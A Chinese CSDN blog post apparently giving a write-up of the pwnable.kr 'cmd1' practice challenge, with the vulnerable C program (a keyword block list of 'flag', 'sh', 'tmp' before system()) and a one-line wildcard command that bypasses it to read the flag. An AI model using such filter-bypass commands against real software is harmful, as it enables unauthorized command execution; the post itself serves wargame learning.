cmd1

最新推荐文章于 2022-06-13 22:02:22 发布
最新推荐文章于 2022-06-13 22:02:22 发布
阅读量399 收藏
点赞数
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiuweideqixu/article/details/104252418
版权

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

/*
 * cmd1.c
 *
 *  Created on: 2020年2月10日
 *      Author: acat
 */
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
		printf("argv[1]:%s\n",argv[1]);
        putenv("PATH=/thankyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}

执行的时候使用命令:
./cmd1 “/bin/cat fla?”
其中,?是通配符,它匹配一个任意的字符.在通配符家族当中,还有另外另个通配符,分别是*和[…].其中,*匹配任意多个任意的字符.[…]匹配[]当中的任意的字符.

这样就可以将flag文件当中的内容打印出来了.

久许
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
66XQA11cmd1
10-23
标记66XQA1cmd1: set /a支持多行表达式并列,比如set /a num1=1+1,num2=1+2,num3=1+3 并且set /a不需要扩展变量,比如set /a num=%num2%+%num3%与set /a num=num2+num3等价
cmd命令
10-27
cmd命令打开文本文档_善用bat命令提高办公效率_weixin_39876145的博客-CSDN博客.pdf
CMD命令
qyszy123的博客
06-13 226
cmd
【第十章】命令执行逻辑
冷眼看world的博客
12-24 678
快速导航命令执行逻辑利用分号;利用&&和||cmd1 && cmd2cmd1 || cmd2管道命令选取命令cut 命令执行逻辑 有时候不想分次执行命令,想在一行里输入,可以用这些方法 利用分号; 可以这样写cmd1; cmd2; cmd3。将命令用;隔开,表示先执行cmd1,再cmd2,最后cmd3。但是这个方法没有逻辑性,前一个命令能否成功执行和后一个命令是否要执行没有关系。 利用&&和|| 如果一个命令正确执行,则Linux会返回一个$?=0的值。所以可
cmd1 - pwnable
SkYe's Blog
09-07 505
cmd1 - pwnable 题目 运行程序,提示段错误程序停止。 分析 运行程序无提示信息,分析源码。 #include <stdio.h> #include <string.h> int filter(char* cmd){ int r=0; r += strstr(cmd, "flag")!=0; r += strstr(cmd, "sh")!=0; r...
pwnable.kr学习之cmd1
neuisf的博客
01-05 132
看题目,Mommy! what is PATH environment in Linux?,联想到题目shellshock利用环境变量执行命令的技巧,尝试了多次,如: ./cmd1 pwd &"env X={ : ;} PATH='/bin/sh' bash /bin/sh" 和./cmd1 &a 但是,会输出奇怪的内容: 第一条命令输出: [1] 84342 -bash...
Python Cmd0.0.1
08-21
Python3用户需安装datetime与tqdm exit 退出 list 查看下载的文件 python3 打开python3 cmd install python3 下载python3 cmd uninstall python3 卸载python3 version 查看版本 now time 显示现在的时间
cmd_cmd_
10-04
1. **命令语法错误**:批处理文件中的命令可能因为语法错误而无法正确执行。例如,命令参数可能不正确,或者命令顺序有误。 2. **环境问题**:某些命令可能依赖于特定的环境变量或系统设置。如果这些环境不正确,...
cmd执行vbs脚本
12-05
我个人喜欢研究cmd,后面无意中接触到vbs,就思考cmd能运行vbs么?---答案是可以的。经过研究发现,cmd可以执行vbs,但是还是需要生成vbs文件,执行完成后删除vbs文件
linux笔试题
weixin_30596165的博客
09-05 5076
1. cron 后台常驻程序 (daemon) 用于: A. 负责文件在网络中的共享 B. 管理打印子系统 C. 跟踪管理系统信息和错误 D. 管理系统日常任务的调度 2. 在大多数Linux发行版本中,以下哪个属于块设备 (block devices) ? A. 串行口 B. 硬盘 C. 虚拟终端 D. 打印机 3. 下面哪个Linux命令可以一次显示一页内容? A. pause B....
pwnable.kr第二遍---uaf cmd1 cmd2
leeham的博客
03-16 404
&gt;&gt;&gt;&gt;uafC++程序逆向gdb-peda看对方服务器上虚表的地址x/3gx 0x11caca0???通过虚表的index来完成函数调用是非常有可能?还是一定会???找到虚函数表??地址的格式\xuse after free:当一个内存块被释放之后再次被使用,下边这些情况:1.内存被释放后,其对应的指针被设置为NULL,然后再次使用,程序会崩溃2.内存块被释放后,其对应的...
pwnable.kr-cmd1-Writeup
baikeng3674的博客
02-11 143
MarkdownPad Document pwnable.kr-cmd1-Writeup 这道题挺有意思,这里详细的记录一下; 首先还是ssh远程登录,ls -l查看文件,然后cat cmd1.c读C代码如下: 1 #include <stdio.h> 2 #include <string.h> 3 4 int filt...
pwnable.kr---cmd1
leeham的博客
11-08 728
pwnable.kr—cmd1解题思路逐步分析题目的含义:putenv("PATH=/fuckyouverymuch");这行代码相当于重写了PATH这个环境变量if(filter(argv[1])) return 0;这行对输入argv[1]继续宁过滤处理,如果返回值为真,则return 0.这里我们需要返回值为false。
【pwnable.kr】cmd1 - putenv() strstr() bypass
think_ycx的专栏
10-09 650
cmd1 - 1 pt Mommy! what is PATH environment in Linux? ssh cmd1@pwnable.kr -p2222 (pw:guest) 登陆服务器之后,cmd1有cmd1_pwn的group权限,可以读flag。 cmd1@ubuntu:~$ ls -l total 20 -r-xr-sr-x 1 root cmd1_pwn 8513 ...
pwnable.kr之cmd1
river
05-09 2271
cmd1 IDA看源码: filter函数,要求第二个参数中不能有flag、sh、tmp字符串,成功返回之后,利用system调用第一个参数。 测试的时候,输入./cmd1 “/bin/cat /home/cmd1/flag”果然不行。 不过我记得Linux中可以用通配符* 所以用:./cmd1 “/bin/cat /home/cmd1/fl*”
使用frps和frpc实现内网穿透
热门推荐
jiuweideqixu的博客
09-07 3万+
内网穿透的作用包括跨网段访问一个局域网中的一台主机。 如上图,假设我们想要通过主机A访问主机C,但是主机A和主机C绑定的都是私有ip地址,所以它们之间是无法直接进行通信的。要想使得A和C能够进行通信,就需要用到内网穿透的技术。 我们可以借助frps(服务端)和frpc(客户端)来实现主机A对主机C的访问。 需要做的是: 1.在绑定了公网ip的主机B中配置frps(服务端) 2.在主机C中配置frpc(客户端) frps/frpc的工具包的github地址是: https://github.
设置kali的分辨率为1920*1080
jiuweideqixu的博客
06-20 5172
首先运行cvt 1920 1080 adog@kali:~$ cvt 1920 1080 # 1920x1080 59.96 Hz (CVT 2.07M9) hsync: 67.16 kHz; pclk: 173.00 MHz Modeline "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync 运行xrand adog@kali:~$ xrandr Screen 0: minimum 1 x
cmd.CommandText = cmd1 + cmd2;
最新发布
03-07
例如,假设cmd1和cmd2分别是两个SQL语句的字符串变量,可以使用以下代码将它们连接起来并赋值给cmd.CommandText: ```csharp cmd.CommandText = cmd1 + cmd2; ``` 这样,cmd.CommandText将包两个SQL语的组合。当...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值